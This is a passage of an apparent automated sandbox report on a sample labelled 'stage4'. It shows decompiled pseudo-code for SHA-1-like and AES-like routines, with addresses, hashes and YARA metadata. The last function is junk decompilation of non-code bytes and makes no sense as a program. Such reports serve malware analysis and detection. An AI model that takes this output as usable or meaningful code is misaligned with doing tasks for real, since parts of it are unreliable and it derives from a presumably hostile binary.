					_t459 =  *(_t278 - 0x14);
					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
					_t278[8] = _t357;
					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
					_t278 =  &(_t278[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t46 =  &_v8;
					 *_t46 = _v8 - 1;
					_t278[6] = _t318 ^ _t399;
					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
				} while ( *_t46 != 0);
				_t320 =  *_t481;
				_t279 = _t481[1];
				_t358 = _t481[2];
				_t404 = _t481[3];
				_v12 = _t320;
				_v16 = _t481[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t462 = _v8;
					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t323 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t404;
					_v12 = _t488;
					asm("rol esi, 0x5");
					_v8 = _t358;
					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t491 = _t279;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t362 = _v12;
					_v8 = _t323;
					_t325 = _v8;
					_v12 = _t410;
					asm("rol edx, 0x5");
					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t413 = _v12;
					_v16 = _t491;
					asm("ror ecx, 0x2");
					_v8 = _t362;
					_v12 = _t285;
					asm("rol eax, 0x5");
					_v16 = _t325;
					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t358 = _v12;
					_t288 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t413;
					_v12 = _t496;
					asm("rol esi, 0x5");
					_v16 = _t288;
					_t279 = _v12;
					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t404 = _v8;
					asm("ror ecx, 0x2");
					_t463 = _t462 + 5;
					_t320 = _t499;
					_v12 = _t320;
					_v8 = _t463;
				} while (_t463 < 0x14);
				_t464 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t404;
					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t334 = _v12;
					_v12 = _t502;
					asm("rol esi, 0x5");
					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t505 = _t279;
					_v16 = _t358;
					_t365 = _v12;
					_v12 = _t420;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t423 = _v12;
					_v8 = _t334;
					_v8 = _t365;
					_v12 = _t292;
					asm("rol eax, 0x5");
					_t464 = _t464 + 5;
					_t358 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
					_t295 = _v8;
					_v8 = _t423;
					_v12 = _t506;
					asm("rol esi, 0x5");
					_t404 = _v8;
					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
					_v16 = _t295;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
				} while (_t464 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t404;
					asm("ror eax, 0x2");
					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
					_t470 = _v12;
					_v12 = _t510;
					asm("rol esi, 0x5");
					_t340 = _v8;
					asm("ror edi, 0x2");
					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
					_v16 = _t358;
					_t369 = _v12;
					_v12 = _t432;
					asm("rol edx, 0x5");
					_v8 = _t279;
					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t299 = _v12;
					_v8 = _t470;
					_v12 = _t434;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t437 = _t369;
					_t358 = _v12;
					_v8 = _t437;
					_v12 = _t522;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
					_t404 = _t299;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
					_t341 = _t340 + 5;
					_v8 = _t341;
				} while (_t341 < 0x3c);
				_t478 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t479 = _v8;
					asm("ror eax, 0x2");
					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
					_t346 = _v12;
					_v16 = _t404;
					_v12 = _t525;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
					_v16 = _t358;
					_t370 = _v12;
					_v12 = _t445;
					asm("rol edx, 0x5");
					_v16 = _t279;
					asm("ror ecx, 0x2");
					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
					_t404 = _v12;
					_v12 = _t303;
					asm("rol eax, 0x5");
					_v16 = _t346;
					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
					_t305 = _t370;
					_v8 = _t346;
					asm("ror edx, 0x2");
					_v8 = _t370;
					_t358 = _v12;
					_v12 = _t532;
					asm("rol esi, 0x5");
					_t478 = _t479 + 5;
					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
					_v16 = _t305;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t404;
					_v12 = _t499;
					_v8 = _t478;
				} while (_t478 < 0x50);
				_t480 = _a4;
				_t480[2] = _t480[2] + _t358;
				_t480[3] = _t480[3] + _t404;
				_t311 = _t480[4] + _v16;
				 *_t480 =  *_t480 + _t499;
				_t480[1] = _t480[1] + _t279;
				_t480[4] = _t311;
				_t480[0x17] = 0;
				return _t311;
			}

0x01208c7b
0x01208c7f
0x01208c81
0x01208c81
0x01208c84
0x01208ca6
0x01208ccc
0x01208cf2
0x01208d14
0x01208d1b
0x01208d1e
0x01208d21
0x01208d2a
0x01208d30
0x01208d37
0x01208d48
0x01208d4b
0x01208d4e
0x01208d52
0x01208d54
0x01208d56
0x01208d5f
0x01208d62
0x01208d65
0x01208d70
0x01208d76
0x01208d78
0x01208d78
0x01208d7b
0x01208d7e
0x01208d7e
0x01208d83
0x01208d85
0x01208d88
0x01208d8b
0x01208d91
0x01208d94
0x01208d97
0x01208da0
0x01208da6
0x01208daf
0x01208dbe
0x01208dc5
0x01208dc8
0x01208dcb
0x01208dd4
0x01208dd7
0x01208dda
0x01208df2
0x01208df9
0x01208dfb
0x01208dfe
0x01208e01
0x01208e0a
0x01208e11
0x01208e14
0x01208e17
0x01208e26
0x01208e2d
0x01208e30
0x01208e33
0x01208e3c
0x01208e46
0x01208e49
0x01208e55
0x01208e58
0x01208e5f
0x01208e62
0x01208e65
0x01208e6a
0x01208e6d
0x01208e76
0x01208e87
0x01208e8a
0x01208e8d
0x01208e94
0x01208e97
0x01208e9a
0x01208e9d
0x01208e9f
0x01208ea2
0x01208ea5
0x01208eae
0x01208eb3
0x01208eb3
0x01208ec8
0x01208ecb
0x01208ece
0x01208ed5
0x01208ed8
0x01208edb
0x01208ef0
0x01208ef7
0x01208efa
0x01208efe
0x01208f01
0x01208f06
0x01208f09
0x01208f18
0x01208f1b
0x01208f22
0x01208f25
0x01208f28
0x01208f2b
0x01208f2e
0x01208f36
0x01208f44
0x01208f47
0x01208f4a
0x01208f4a
0x01208f51
0x01208f54
0x01208f57
0x01208f5f
0x01208f6d
0x01208f70
0x01208f77
0x01208f7a
0x01208f7d
0x01208f80
0x01208f83
0x01208f8c
0x01208f93
0x01208f93
0x01208f99
0x01208fb2
0x01208fb5
0x01208fbc
0x01208fbf
0x01208fc2
0x01208fd4
0x01208fde
0x01208fe1
0x01208fea
0x01208fed
0x01208ff4
0x01208ff7
0x01208ffd
0x01209010
0x01209017
0x0120901a
0x0120901d
0x01209020
0x01209029
0x0120902c
0x0120903f
0x01209042
0x0120904c
0x0120904f
0x01209051
0x0120905a
0x0120905d
0x01209070
0x01209076
0x01209079
0x01209080
0x01209082
0x01209085
0x01209088
0x0120908b
0x0120908e
0x01209091
0x0120909a
0x0120909f
0x012090a2
0x012090a2
0x012090b5
0x012090b8
0x012090bb
0x012090c2
0x012090c5
0x012090c8
0x012090cb
0x012090de
0x012090e1
0x012090ec
0x012090ef
0x012090fb
0x012090fe
0x01209104
0x01209107
0x0120910a
0x01209111
0x01209121
0x01209124
0x0120912a
0x0120912d
0x01209134
0x01209136
0x01209139
0x0120913c
0x0120913f
0x01209142
0x01209149
0x01209158
0x0120915b
0x01209162
0x01209165
0x01209168
0x0120916b
0x0120916e
0x01209171
0x01209174
0x0120917d
0x0120918e
0x01209196
0x0120919c
0x0120919f
0x012091a1
0x012091a4
0x012091a7
0x012091b4

Strings

(, xrefs: 01208F8C

Memory Dump Source

Source File: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Offset: 01200000, based on PE: true

Associated: 00000000.00000002.395866827.0000000001200000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_stage4.jbxd

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction ID: b9214e24d384255e51c59ee543cc11734ac2284ab74cab95996dceba126ea3a6
Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction Fuzzy Hash: 10022DB6E006199FDB14CF9AC8805DDFBF2FF88314F1AC1AAD849A3315D6746A418F80

Uniqueness

Uniqueness Score: -1.00%

Function 01202FB0, Relevance: .4, Instructions: 435
COMMONCrypto

Download Yara Rule

C-Code - Quality: 26%

			E01202FB0(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t273;
				signed int _t274;
				signed int _t282;
				signed int* _t358;
				signed int _t383;
				signed int* _t409;
				signed int _t429;
				signed int _t458;
				signed int _t478;
				signed int _t560;
				signed int _t603;

				_t273 = __eax;
				asm("ror edi, 0x8");
				asm("rol edx, 0x8");
				_t458 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_v20 = _t458;
				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
				asm("ror esi, 0x8");
				asm("rol edx, 0x8");
				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
				asm("ror edx, 0x10");
				asm("ror esi, 0x8");
				asm("rol esi, 0x8");
				_v24 = _t282;
				_t429 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
				asm("ror esi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t603 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
				asm("ror ebx, 0x8");
				asm("ror edi, 0x10");
				asm("rol edi, 0x8");
				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
				asm("ror edi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t409 =  &(__ecx[8]);
				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
				_t478 = (_a4 >> 1) - 1;
				_a4 = _t478;
				if(_t478 != 0) {
					do {
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
						asm("ror ebx, 0x8");
						asm("ror edi, 0x10");
						asm("rol edi, 0x8");
						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
						asm("ror edi, 0x10");
						asm("ror edx, 0x8");
						asm("rol edx, 0x8");
						_v24 = _t383;
						_t560 =  *(__eax + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
						asm("ror edx, 0x10");
						asm("ror esi, 0x8");
						asm("rol esi, 0x8");
						_t429 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t560 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
						asm("ror esi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_t603 =  *(__eax + 4 + (_t560 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
						_v12 = _t560;
						asm("ror edi, 0x8");
						asm("ror ebx, 0x10");
						asm("rol ebx, 0x8");
						_v16 =  *(__eax + 4 + (_t560 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
						asm("ror ebx, 0x10");
						asm("ror edi, 0x8");
						asm("rol edi, 0x8");
						_t409 =  &(_t409[8]);
						_t205 =  &_a4;
						 *_t205 = _a4 - 1;
						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
					} while ( *_t205 != 0);
				}
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				 *_a8 = (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_a8[1] = (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_t358 = _a8;
				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
				asm("ror ecx, 0x8");
				asm("rol edi, 0x8");
				_t358[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0x00ff00ff;
				return _t274;
			}

0x01202fb0
0x01202fbf
0x01202fc8
0x01202fd6
0x01202fda
0x01202fe3
0x01202ff4
0x01202ff7
0x01202ffc
0x01203005
0x01203013
0x01203018
0x01203021
0x01203031
0x01203051
0x01203054
0x01203066
0x0120306b
0x01203080
0x0120309d
0x012030a0
0x012030b1
0x012030c6
0x012030e6
0x012030e9
0x012030fb
0x01203119
0x01203136
0x01203139
0x0120314b
0x01203160
0x01203166
0x0120316e
0x0120316f
0x01203172
0x01203180
0x01203190
0x012031a2
0x012031b4
0x012031d0
0x012031e3
0x012031f0
0x01203201
0x01203218
0x0120323a
0x0120323d
0x0120324e
0x01203269
0x01203280
0x01203283
0x01203295
0x0120329d
0x012032b2
0x012032cf
0x012032d2
0x012032e3
0x01203307
0x01203317
0x0120331a
0x0120332c
0x01203344
0x01203347
0x0120335a
0x01203367
0x01203379
0x01203391
0x012033b4
0x012033b7
0x012033c9
0x012033de
0x012033e4
0x012033e4
0x012033e7
0x012033e7
0x01203180
0x0120344b
0x01203454
0x01203462
0x012034c0
0x012034c9
0x012034d7
0x01203539
0x01203542
0x0120354f
0x01203552
0x0120359e
0x012035aa
0x012035b3
0x012035c0
0x012035c7

Memory Dump Source

Source File: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Offset: 01200000, based on PE: true

Associated: 00000000.00000002.395866827.0000000001200000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_stage4.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
Instruction ID: a8a3e883b6036a3d6287534e48c34b0711b6a052cde7963a8ab8562c38c4a69a
Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
Instruction Fuzzy Hash: 5B026E73E547164FE720CE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90

Uniqueness

Uniqueness Score: -1.00%

Function 0121BCDD, Relevance: .3, Instructions: 302
COMMONCrypto

Download Yara Rule

C-Code - Quality: 57%

			E0121BCDD() {
				void* _t42;
				signed char _t43;
				signed int _t46;
				void* _t47;
				signed int _t49;
				signed int _t52;
				void* _t53;
				signed char _t57;
				signed int _t58;
				signed int _t60;
				signed char _t65;
				signed int _t66;
				signed int _t73;
				void* _t74;
				void* _t75;
				signed int _t77;
				void* _t82;
				signed int _t83;
				signed int _t84;
				signed int _t85;
				signed int _t86;

				 *0x441b981a =  *0x441b981a | _t65;
				_pop(_t77);
				 *0x2c6abb89 = _t77;
				asm("adc ecx, [0x619aa533]");
				 *0x660dac25 =  *0x660dac25 + _t84;
				asm("sbb edi, [0xd7368c3e]");
				asm("ror byte [0x2ce461e2], 0x4d");
				 *0xfd9363c1 = 0x29b616d1;
				_t85 = _t84 |  *0x219e0ffc;
				asm("ror dword [0xed0ced81], 0x87");
				_t66 =  *0x82c4aa85;
				asm("scasb");
				 *0x5f33362e =  *0x5f33362e - _t42;
				 *0xf5932ffa =  *0xf5932ffa | _t77;
				asm("rol dword [0xc410b83d], 0x31");
				asm("sbb edi, [0xe08c396f]");
				_t54 = _t53 +  *0x2d023e33;
				asm("adc [0xaefc118b], edi");
				_t82 = _t85;
				_t43 =  *0x5264e860 * 0x470a;
				_t83 = _t82 -  *0xe69fbff;
				_t86 = _t85 ^  *0xbbed5bd8;
				 *0x4ad2472d =  *0x4ad2472d << 0x7d;
				if( *0x4ad2472d > 0) {
					__ecx =  *0xdf98677e * 0x58cd;
					__edi = __edi | 0x20a38981;
					__eax = __eax |  *0x8ff978bc;
					__cl = __cl |  *0x6449bef6;
					__esp = __esp + 0xce989065;
					 *0x8af96e02 =  *0x8af96e02 - __dl;
					 *0xc2df04c1 =  *0xc2df04c1 << 0x8f;
					 *0xeba39305 =  *0xeba39305 << 0x4a;
					asm("sbb [0x8705c2d7], ch");
					asm("stosd");
					__eax =  *0x5c2d0eb;
					__ecx =  *0xdcf1906b * 0x5c2;
					__edi = __edi + 1;
					__edx = 0xc2def59b;
					asm("adc ecx, 0xd97a2305");
					asm("adc [0x5403c2ce], esp");
					asm("scasd");
					asm("adc [0xf10a0488], ch");
					_push( *0x46043e62);
					 *0x43e5d18 =  *0x43e5d18 & __bl;
					if( *0x43e5d18 >= 0) {
						__edx =  *0x3e67127c * 0x2b04;
						asm("rcl dword [0x53e6513], 0x2a");
						__ah = __ah -  *0xcaee9b10;
						__edx =  *0x3e67127c * 0x00002b04 | 0x6b9405c2;
						asm("sbb [0x5c2d0dd], edi");
						__ecx = __ecx - 1;
						_t34 = __esp;
						__esp =  *0xc2d2e499;
						 *0xc2d2e499 = _t34;
						__ebp = __ebp &  *0xae5b9207;
						asm("ror byte [0xba3bf724], 0x5d");
						_pop( *0xba39fa23);
						 *0xa3415f07 =  *0xa3415f07 - __edx;
						__ebp = __ebp &  *0xba37f811;
						asm("adc eax, [0xc3585e07]");
						 *0xba3f953e =  *0xba3f953e + __esi;
						 *0x87350608 =  *0x87350608 >> 0x80;
						__esp =  *0xc2d2e499 &  *0x37edc4da;
						 *0x59d408ba =  *0x59d408ba << 0x41;
						asm("rcr dword [0xc019c3c8], 0x43");
						_push(__ecx);
						if(( *0x3d5e08ba & __edx) > 0) {
							__edi =  *0xefb7d27e * 0xba3c;
							__al = __al |  *0xe869dc08;
							_push(0xc73ae90f);
							__ecx = __ecx - 1;
							__edx = 0x3e09669a;
							asm("adc ebx, [0x42538c7]");
							__edx = 0x58ab0c8d;
							asm("sbb edx, [0xecd5e09]");
							__ebp =  *0x4ff3c360 * 0x6695;
							asm("sbb dh, 0xa");
							asm("ror dword [0xa245e936], 0x79");
							asm("rcr dword [0x5423cbd3], 0xae");
							 *0x48bd0be3 =  *0x48bd0be3 << 0x32;
							_push( *0x4bd887a1);
							asm("cmpsw");
							_t41 = __ecx;
							__ecx =  *0x3df1b765;
							 *0x3df1b765 = _t41;
							__esi = __esi &  *0x7e011ba;
							__edx = 0x58ab0c8c;
						}
					}
				}
				L1:
				_t83 = _t83 ^  *0x9163d009;
				asm("adc ecx, [0xcb376964]");
				asm("rol dword [0xf5d30d66], 0x56");
				_t66 = _t66 ^ 0x0c5600c5;
				_t86 = _t86 + 0x00000001 &  *0x150c2365;
				 *0x5024cc08 = _t43;
				if(_t86 > 0) {
					 *0x6fe0ff76 =  *0x6fe0ff76 << 0xd3;
					asm("rcr dword [0xbd9d05ba], 0x13");
					 *0xdc2f2c5 =  *0xdc2f2c5 << 0xdf;
					 *0x12644fe5 =  *0x12644fe5 ^ _t46;
					 *0xbf7d8c13 =  *0xbf7d8c13 | _t83;
					asm("sbb edi, [0x10b0771d]");
					asm("sbb esp, [0x9fc9fd8]");
					_t83 =  *0xf277a2f7;
					asm("ror byte [0x5838e010], 0x8");
					 *0xc879156f = _t77;
					_pop(_t57);
					_t54 = _t57 &  *0xdb161904;
					_t66 = _t66 ^ 0x0000000a;
					 *0x4f4209e3 =  *0x4f4209e3 | _t54;
					_t86 = _t86 - 1;
					 *0x51056664 =  *0x51056664 | _t54;
					asm("sbb cl, 0xca");
					_t43 = (_t43 | 0x0000000a) +  *0xda085b12 |  *0xac2d4fd;
					 *0xe1755d15 =  *0xe1755d15 << 0x62;
					 *0x680cba93 =  *0x680cba93 - _t66;
					_t77 = _t77 +  *0x5fe0d3d6 - 0x2c51de2b &  *0x40e196fb |  *0xdae16ea9;
					 *0x2c370fe3 =  *0x2c370fe3 + _t66;
